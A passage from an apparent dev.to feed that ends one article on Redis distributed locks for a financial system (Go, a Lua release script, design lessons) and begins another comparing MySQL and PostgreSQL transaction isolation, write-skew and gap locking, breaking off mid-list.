&lt;code&gt;bsm/redislock&lt;/code&gt; - Simple, works great with a single Redis master&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;go-redsync/redsync&lt;/code&gt; - Implements Redlock algorithm for multi-master Redis clusters&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We chose &lt;code&gt;bsm/redislock&lt;/code&gt; because our Redis deployment is single-master. For multi-master setups, you'd want &lt;code&gt;go-redsync&lt;/code&gt; to handle the distributed consensus problem.&lt;/p&gt;

&lt;h3&gt;
  
  
  How the Lock System Works
&lt;/h3&gt;

&lt;p&gt;Every lock in Redis follows a simple pattern:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lock Key Format:&lt;/strong&gt; &lt;code&gt;lock_event_{resource}_{entity_id}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;For example: &lt;code&gt;lock_event_transaction_A2547&lt;/code&gt; when a user is editing Transaction #A2547.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lock Lifetime (TTL):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Quick edits: 10 seconds&lt;/li&gt;
&lt;li&gt;Data imports: 30 seconds&lt;/li&gt;
&lt;li&gt;Batch approvals: 15 minutes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Retry Strategy:&lt;/strong&gt; If the lock is busy, we retry 3 times with exponential backoff (50ms, 100ms, 200ms). After that, we tell the user someone else is working on it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lock Metadata:&lt;/strong&gt; We store what operation is holding the lock (create/update/delete/approve). This lets us give users helpful error messages like "This record is being approved" instead of generic "Resource locked" errors.&lt;/p&gt;

&lt;h3&gt;
  
  
  How Locks Work in Practice
&lt;/h3&gt;

&lt;p&gt;When a user tries to edit a financial record, here's what happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;System generates a lock key based on the record identifier&lt;/li&gt;
&lt;li&gt;Check Redis: Is this locked? If yes, what operation is holding it?&lt;/li&gt;
&lt;li&gt;If available, create the lock with a unique token and store what operation is happening&lt;/li&gt;
&lt;li&gt;Set TTL so it auto-expires (prevents orphaned locks if something crashes)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The lock stored in Redis contains:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A unique key identifying the specific record&lt;/li&gt;
&lt;li&gt;A random token proving ownership&lt;/li&gt;
&lt;li&gt;Metadata about the operation type (edit/approve/delete)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The token ensures only the lock owner can release it; the operation metadata, as noted earlier, drives the specific error messages users see.&lt;/p&gt;




&lt;h3&gt;
  
  
  Two Ways to Release Locks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Pattern 1: Auto-Release (For Quick Operations)
&lt;/h4&gt;

&lt;p&gt;For normal edits that finish in a few seconds:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Acquire the lock&lt;/li&gt;
&lt;li&gt;Do the update&lt;/li&gt;
&lt;li&gt;Automatically release when done, even if something panics. Since we use Go, putting the lock release in a &lt;code&gt;defer&lt;/code&gt; guarantees cleanup.&lt;/li&gt;
&lt;li&gt;TTL: 10-30 seconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Examples: Editing a field, updating an amount, creating a new record&lt;/p&gt;
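&lt;p&gt;A minimal sketch of this pattern with &lt;code&gt;bsm/redislock&lt;/code&gt;, assuming a local single-master Redis; the key name and TTL are illustrative:&lt;/p&gt;

```go
package main

import (
	"context"
	"fmt"
	"time"

	"github.com/bsm/redislock"
	"github.com/redis/go-redis/v9"
)

func main() {
	ctx := context.Background()
	client := redis.NewClient(&amp;redis.Options{Addr: "localhost:6379"})
	locker := redislock.New(client)

	// Acquire the lock for a quick edit; the 10s TTL matches the lifetimes above.
	lock, err := locker.Obtain(ctx, "lock_event_transaction_A2547", 10*time.Second, nil)
	if err == redislock.ErrNotObtained {
		fmt.Println("record is being modified by another user")
		return
	} else if err != nil {
		panic(err)
	}
	// defer guarantees the release runs even if the update panics.
	defer lock.Release(ctx)

	// ... perform the update here ...
}
```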

&lt;h4&gt;
  
  
  Pattern 2: Manual Release (For Background Jobs)
&lt;/h4&gt;

&lt;p&gt;For batch operations that take 15+ minutes:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Problem:&lt;/strong&gt; When a user initiates a large batch operation, the web request returns immediately, but the actual processing happens in a background job. If we auto-release the lock when the web request finishes, the lock is gone before the job even starts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Solution:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Web request acquires the lock&lt;/li&gt;
&lt;li&gt;Store the lock token in the database&lt;/li&gt;
&lt;li&gt;Pass the token to the background job via message queue&lt;/li&gt;
&lt;li&gt;Background job releases the lock when it finishes&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This way, the lock survives across the process boundary. If the job crashes, the lock expires after 15 minutes (TTL).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Safe Lock Release with Lua Script:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The manual release uses a Lua script to safely release locks. According to &lt;a href="https://redis.io/docs/latest/develop/clients/patterns/distributed-locks/#correct-implementation-with-a-single-instance" rel="noopener noreferrer"&gt;Redis distributed locks documentation&lt;/a&gt;, this is the correct way to avoid accidentally releasing another client's lock:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight lua"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"get"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;KEYS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;ARGV&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="k"&gt;then&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"del"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;KEYS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="k"&gt;else&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This script ensures we only delete the lock if the token matches—preventing us from accidentally releasing a lock that belongs to another process.&lt;/p&gt;
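&lt;p&gt;Calling that script from Go might look like this (a sketch using &lt;code&gt;go-redis&lt;/code&gt;; function and variable names are illustrative):&lt;/p&gt;

```go
package locks

import (
	"context"

	"github.com/redis/go-redis/v9"
)

// releaseScript is the compare-and-delete script shown above.
const releaseScript = `if redis.call("get", KEYS[1]) == ARGV[1] then
    return redis.call("del", KEYS[1])
else
    return 0
end`

// releaseLock deletes the lock only if the stored token matches ours,
// returning true when the lock was actually released.
func releaseLock(ctx context.Context, client *redis.Client, key, token string) (bool, error) {
	n, err := client.Eval(ctx, releaseScript, []string{key}, token).Int()
	if err != nil {
		return false, err
	}
	return n == 1, nil
}
```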

&lt;p&gt;&lt;strong&gt;When locks get released:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Job completes successfully → Released immediately&lt;/li&gt;
&lt;li&gt;Job fails after max retries → Released (can retry later with fresh lock)&lt;/li&gt;
&lt;li&gt;System crashes → Redis auto-expires after TTL&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Lessons Learned: Building Concurrency Control for Financial Systems
&lt;/h2&gt;

&lt;h3&gt;
  
  
  When to Use Which Lock
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Use Pessimistic Locking (Redis) when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Multiple users are actively editing the same records right now&lt;/li&gt;
&lt;li&gt;You need to block concurrent operations completely&lt;/li&gt;
&lt;li&gt;Operations might take a while or run in background jobs&lt;/li&gt;
&lt;li&gt;You need locks to survive across different servers/processes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use Optimistic Locking (Version Check) when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You want to detect if data changed while user was away&lt;/li&gt;
&lt;li&gt;Conflicts are rare and you don't want to block everyone&lt;/li&gt;
&lt;li&gt;Operations are quick and you just need to verify data freshness at commit time&lt;/li&gt;
&lt;li&gt;You want defense-in-depth alongside pessimistic locks&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  What We Got Right
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;TTL on everything&lt;/strong&gt; - No orphaned locks if something crashes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exponential backoff retries&lt;/strong&gt; - Give legitimate operations a chance to finish&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Operation metadata in locks&lt;/strong&gt; - Users get helpful error messages&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Two-phase approach&lt;/strong&gt; - Pessimistic + Optimistic catches all scenarios&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lock monitoring&lt;/strong&gt; - Track acquisition times, contention rates, timeouts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Graceful Redis failures&lt;/strong&gt; - Circuit breakers prevent cascading failures&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  The Trade-offs We Made
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Performance vs Safety:&lt;/strong&gt; Yes, locking adds latency. But in financial systems, correctness matters more than speed. We'd rather users wait a fraction of a second than risk data corruption.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Complexity vs Reliability:&lt;/strong&gt; Redis adds infrastructure to maintain. But it's worth it to avoid database connection exhaustion and support async workflows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fine-grained locks:&lt;/strong&gt; We lock individual records, not entire tables. This reduces contention but requires careful key design.&lt;/p&gt;




&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;In financial systems, data integrity isn't optional. Every record must be accurate, every change must be tracked, and every concurrent access must be controlled.&lt;/p&gt;

&lt;p&gt;The two-lock approach—pessimistic for real-time conflicts, optimistic for stale data—gives us defense in depth. And by choosing Redis over database locks, we can support the long-running batch operations that financial workflows require.&lt;/p&gt;

&lt;p&gt;Is it more complex than no locking? Absolutely. Is it worth it? When dealing with financial data, regulatory compliance, and audit trails, the answer is always yes.&lt;/p&gt;

</description>
      <category>architecture</category>
      <category>database</category>
      <category>systemdesign</category>
    </item>
    <item>
      <title>Part 4: MySQL vs PostgreSQL - Transaction Processing and ACID Compliance</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Sun, 19 Oct 2025 06:25:02 +0000</pubDate>
      <link>https://dev.to/harry_do/part-4-mysql-vs-postgresql-transaction-processing-and-acid-compliance-4of2</link>
      <guid>https://dev.to/harry_do/part-4-mysql-vs-postgresql-transaction-processing-and-acid-compliance-4of2</guid>
      <description>&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;1. Overview: Key Architectural Differences&lt;/li&gt;
&lt;li&gt;2. Isolation Levels and Concurrency Control&lt;/li&gt;
&lt;li&gt;3. MVCC and Transaction Isolation&lt;/li&gt;
&lt;li&gt;4. SERIALIZABLE Isolation: Pessimistic vs Optimistic Strategies&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Transaction processing reveals fundamental architectural differences between MySQL and PostgreSQL. MySQL prioritizes performance and predictability through pessimistic locking. PostgreSQL prioritizes consistency and concurrency through optimistic conflict detection. Understanding these differences will help you write better applications and avoid subtle data integrity issues.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Overview: Key Architectural Differences
&lt;/h2&gt;

&lt;p&gt;This section provides a high-level comparison of how MySQL and PostgreSQL handle transactions. We'll cover three fundamental areas where they differ: ACID compliance, default isolation levels, and MVCC implementation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Core Architecture Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ACID Compliance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Engine-dependent - InnoDB provides full ACID, MyISAM does not&lt;/td&gt;
&lt;td&gt;Built-in - ACID compliance is part of core architecture&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default Isolation Level&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;REPEATABLE READ - Stricter by default&lt;/td&gt;
&lt;td&gt;READ COMMITTED - More concurrent by default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;MVCC Implementation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Undo log - Automatic cleanup, zero maintenance&lt;/td&gt;
&lt;td&gt;Tuple versioning - Requires VACUUM maintenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Phantom Read Prevention&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Gap locking (at REPEATABLE READ)&lt;/td&gt;
&lt;td&gt;Snapshot isolation (at REPEATABLE READ)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What Each Difference Means
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;ACID Compliance:&lt;/strong&gt;&lt;br&gt;
MySQL's ACID support depends on which storage engine you use. InnoDB (the default) provides full ACID compliance, but MyISAM does not. PostgreSQL has ACID compliance built into its core architecture—every storage mechanism supports it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Default Isolation Levels:&lt;/strong&gt;&lt;br&gt;
MySQL defaults to REPEATABLE READ, providing stronger isolation out of the box. PostgreSQL defaults to READ COMMITTED, favoring higher concurrency. Both prevent phantom reads at REPEATABLE READ level, but through different mechanisms (gap locking vs snapshot isolation).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MVCC Maintenance:&lt;/strong&gt;&lt;br&gt;
MySQL's undo log approach means old row versions are automatically cleaned up by a background purge thread—zero operational overhead. PostgreSQL's tuple versioning approach stores multiple row versions in the table itself, requiring VACUUM to reclaim space from dead tuples.&lt;/p&gt;
&lt;h2&gt;
  
  
  2. Isolation Levels and Concurrency Control
&lt;/h2&gt;

&lt;p&gt;💡 &lt;strong&gt;Key Insight:&lt;/strong&gt; Both MySQL and PostgreSQL are overachievers—they prevent phantom reads at REPEATABLE READ even though the SQL standard doesn't require it! 🎓 But here's the plot twist: MySQL is like that friend who locks ALL the doors (gap locking), while PostgreSQL takes a snapshot and says "trust, but verify" (snapshot isolation). Different philosophies, different trade-offs!&lt;/p&gt;
&lt;h3&gt;
  
  
  2.1 Isolation Levels Comparison
&lt;/h3&gt;

&lt;p&gt;The SQL standard defines four isolation levels, but MySQL and PostgreSQL interpret them quite differently. The key difference? &lt;strong&gt;Their default choices reveal their priorities.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Isolation Level&lt;/th&gt;
&lt;th&gt;MySQL 8.4 Behavior&lt;/th&gt;
&lt;th&gt;PostgreSQL 17 Behavior&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;READ UNCOMMITTED&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Supported but rarely used - InnoDB allows dirty reads at this level&lt;/td&gt;
&lt;td&gt;Not truly supported - Behaves exactly like READ COMMITTED&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;READ COMMITTED&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Available - Allows non-repeatable reads and phantom reads&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Default&lt;/strong&gt; - Allows non-repeatable reads and phantom reads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;REPEATABLE READ&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Default&lt;/strong&gt; - Gap locking + MVCC prevents phantoms, allows write-skew&lt;/td&gt;
&lt;td&gt;Available - Snapshot isolation prevents phantoms, allows write-skew&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SERIALIZABLE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pessimistic - Converts plain SELECTs to FOR SHARE, prevents conflicts via locking&lt;/td&gt;
&lt;td&gt;Optimistic - SSI detects conflicts at commit, can abort transactions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Notice the defaults? MySQL ships with REPEATABLE READ—it's saying "I'll protect you even if it means blocking more." PostgreSQL ships with READ COMMITTED—it's saying "Let's be fast and concurrent; upgrade isolation when you need it."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here's the fascinating part:&lt;/strong&gt; Both databases go beyond the SQL standard at REPEATABLE READ by preventing phantom reads (when new rows appear in repeated queries). The standard doesn't require this! But they achieve it in completely opposite ways:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MySQL's approach&lt;/strong&gt;: Use gap locks to physically block inserts that would create phantoms. It's like putting a "Reserved" sign on every empty seat at a restaurant.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL's approach&lt;/strong&gt;: Take a snapshot and ignore any new rows added after. It's like taking a photo of the restaurant—even if new people arrive, your photo stays the same.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Critical insight for your app:&lt;/strong&gt; Neither prevents write-skew at REPEATABLE READ (we'll explain this next). If you need protection against sophisticated anomalies, both databases require SERIALIZABLE—but they implement it VERY differently.&lt;/p&gt;
&lt;h3&gt;
  
  
  2.2 Write-Skew Anomaly
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What is Write-Skew?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Write-skew is the sneakiest of database anomalies—it's like two people independently making perfectly reasonable decisions that somehow create chaos when combined. 🤔&lt;/p&gt;

&lt;p&gt;Let me explain with a real-world scenario that'll make this crystal clear.&lt;/p&gt;
&lt;h4&gt;
  
  
  The Doctor On-Call Scheduling Problem
&lt;/h4&gt;

&lt;p&gt;Picture this: You're running a hospital with one iron-clad rule—&lt;strong&gt;at least 2 doctors must be on-call at all times&lt;/strong&gt;. Right now, Alice, Bob, and Charlie are all on-call, so you're safely above the minimum. 🏥&lt;/p&gt;

&lt;p&gt;It's Friday evening, and both Alice and Bob are exhausted. They each want to go off-call, but they're responsible professionals—they'll only leave if there are still enough doctors remaining.&lt;/p&gt;

&lt;p&gt;Here's what happens at &lt;strong&gt;REPEATABLE READ&lt;/strong&gt; isolation level:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Timeline:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Time    Transaction 1 (Alice)                    Transaction 2 (Bob)
----    ---------------------------              ---------------------------
T1      BEGIN                                    BEGIN
T2      SELECT COUNT(*) FROM doctors
        WHERE on_call = true;
        → Returns 3 ✅

T3                                               SELECT COUNT(*) FROM doctors
                                                 WHERE on_call = true;
                                                 → Returns 3 ✅

T4      "Great! 3 doctors on-call,
        safe for me to leave."
        UPDATE doctors
        SET on_call = false
        WHERE name = 'Alice';

T5                                               "Great! 3 doctors on-call,
                                                 safe for me to leave."
                                                 UPDATE doctors
                                                 SET on_call = false
                                                 WHERE name = 'Bob';

T6      COMMIT ✅                                COMMIT ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The Result:&lt;/strong&gt; Both transactions succeed! But now only Charlie is on-call. 😱 The "at least 2" constraint is violated!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why did this happen?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is write-skew. Here's what makes it so tricky:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Both transactions read the same data&lt;/strong&gt; (count of on-call doctors = 3)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Both made reasonable decisions&lt;/strong&gt; based on what they saw&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Both updated DIFFERENT rows&lt;/strong&gt; (Alice's record vs Bob's record)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No direct conflict&lt;/strong&gt; occurred—traditional locks see no problem!&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The constraint was violated&lt;/strong&gt; because neither transaction saw the other's changes&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In database terms: Write-skew occurs when two concurrent transactions read overlapping data sets, make decisions based on what they read, then write to &lt;strong&gt;disjoint&lt;/strong&gt; (non-overlapping) sets of rows in a way that violates an integrity constraint.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why don't traditional locks catch this?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Because there's no write-write conflict! Alice updates Alice's row. Bob updates Bob's row. Different rows = no lock conflict. The database doesn't know that these two independent updates, when combined, violate a business rule. 🤷‍♂️&lt;/p&gt;

&lt;p&gt;It's like two people checking the fridge, seeing 3 beers, each taking one—nobody's stealing the other's beer, but somehow the third roommate ends up with nothing. The &lt;strong&gt;reads overlap&lt;/strong&gt; (both see the same count), but the &lt;strong&gt;writes don't&lt;/strong&gt; (different rows).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Key Difference:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;MySQL REPEATABLE READ&lt;/th&gt;
&lt;th&gt;PostgreSQL REPEATABLE READ&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Write-Skew Protection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Not prevented&lt;/td&gt;
&lt;td&gt;❌ Not prevented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Why It Occurs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Gap locks only prevent phantom reads, not cross-row constraint violations&lt;/td&gt;
&lt;td&gt;Snapshot Isolation doesn't detect conflicts on different rows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Must use SERIALIZABLE or explicit locking (&lt;code&gt;SELECT ... FOR UPDATE&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Must use SERIALIZABLE (SSI detects and aborts) or explicit locking&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bottom Line:&lt;/strong&gt; Both databases &lt;strong&gt;allow write-skew at REPEATABLE READ&lt;/strong&gt;. The real difference appears at SERIALIZABLE level—PostgreSQL's SSI can detect and abort write-skew patterns automatically, while MySQL's gap locking only prevents conflicts through blocking, not intelligent detection.&lt;/p&gt;
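&lt;p&gt;In SQL, the two fixes look like this—a sketch using the &lt;code&gt;doctors&lt;/code&gt; table from the scenario above:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Fix 1: explicit locking (works on both databases).
-- Locking the rows the decision was based on forces Alice and Bob to serialize.
BEGIN;
SELECT * FROM doctors WHERE on_call = true FOR UPDATE;
UPDATE doctors SET on_call = false WHERE name = 'Alice';
COMMIT;

-- Fix 2: SERIALIZABLE (PostgreSQL syntax shown; SSI aborts one transaction)
BEGIN ISOLATION LEVEL SERIALIZABLE;
SELECT COUNT(*) FROM doctors WHERE on_call = true;
UPDATE doctors SET on_call = false WHERE name = 'Bob';
COMMIT;  -- the second committer may fail with SQLSTATE 40001; re-run it
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;On MySQL, Fix 2 is spelled &lt;code&gt;SET TRANSACTION ISOLATION LEVEL SERIALIZABLE;&lt;/code&gt; followed by &lt;code&gt;START TRANSACTION;&lt;/code&gt;—and it prevents the anomaly by blocking rather than aborting.&lt;/p&gt;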

&lt;h3&gt;
  
  
  2.3 Gap Locking vs Predicate Locks
&lt;/h3&gt;

&lt;p&gt;Remember how we said both MySQL and PostgreSQL prevent phantom reads at REPEATABLE READ? This is &lt;strong&gt;how&lt;/strong&gt; they do it—and the approaches couldn't be more different. Understanding this difference is crucial because it directly impacts your application's concurrency under load.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Core Problem: Phantom Reads&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine you're counting inventory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;COUNT&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;products&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;category&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Electronics'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;-- Returns 100&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;During your transaction, someone inserts a new product with &lt;code&gt;category = 'Electronics'&lt;/code&gt;. If you run the same query again and suddenly get 101, that's a phantom read—a row that "appeared" out of nowhere. 👻&lt;/p&gt;

&lt;p&gt;Both databases prevent this at REPEATABLE READ, but with radically different strategies.&lt;/p&gt;

&lt;h4&gt;
  
  
  MySQL's Gap Locking: The Pessimistic Gatekeeper
&lt;/h4&gt;

&lt;p&gt;MySQL uses &lt;strong&gt;gap locks&lt;/strong&gt;—it literally locks the "gaps" (empty spaces) in the index between existing records. Think of it like reserving not just the occupied tables at a restaurant, but also the empty spaces between them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you run a query with &lt;code&gt;FOR UPDATE&lt;/code&gt;, MySQL doesn't just lock the rows that match—it locks the &lt;strong&gt;index ranges&lt;/strong&gt; those rows occupy, including the gaps. This physically prevents anyone from inserting new rows that would fall into those gaps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; Lock products with IDs between 100-200:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;products&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;BETWEEN&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;UPDATE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;MySQL locks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;All existing rows with IDs 100-200 (obviously)&lt;/li&gt;
&lt;li&gt;The gap &lt;em&gt;before&lt;/em&gt; 100 (e.g., 95-99)&lt;/li&gt;
